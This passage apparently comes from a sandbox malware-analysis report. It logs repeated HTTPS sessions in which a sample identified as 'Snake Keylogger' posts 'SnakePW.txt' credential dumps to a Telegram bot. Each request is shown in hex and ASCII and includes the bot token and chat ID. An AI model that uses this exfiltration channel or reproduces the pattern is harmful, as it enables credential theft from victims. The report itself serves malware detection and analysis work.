                            Date: Sun, 26 Jun 2022 07:33:14 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:14 UTC139INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66839,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228794,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            83192.168.2.549919149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:14 UTC140OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e9bedca3
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:14 UTC140OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 39 62 65 64 63 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e9bedca3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:14 UTC141INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:14 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:14 UTC141INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66840,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228794,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            84192.168.2.549922149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:14 UTC141OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ea0b2858
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:14 UTC142OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 61 30 62 32 38 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ea0b2858Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:15 UTC142INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:15 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:15 UTC143INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66841,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228795,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            85192.168.2.549925149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:15 UTC143OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ea492460
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:15 UTC143OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 61 34 39 32 34 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ea492460Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:15 UTC144INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:15 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:15 UTC144INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66842,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228795,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            86192.168.2.549928149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:15 UTC145OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ea7d9812
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:15 UTC145OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 61 37 64 39 38 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ea7d9812Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:15 UTC146INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:15 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:15 UTC146INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66843,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228795,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            87192.168.2.549931149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:16 UTC146OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756eabb954a
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:16 UTC147OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 61 62 62 39 35 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756eabb954aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:16 UTC147INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:16 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:16 UTC148INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66845,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228796,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            88192.168.2.549934149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:16 UTC148OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756eaf730d3
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:16 UTC148OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 61 66 37 33 30 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756eaf730d3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:16 UTC149INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:16 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:16 UTC149INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66846,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228796,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            89192.168.2.549936149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:16 UTC150OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756eb3c569c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:16 UTC150OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 62 33 63 35 36 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756eb3c569cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:17 UTC151INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:17 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:17 UTC151INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
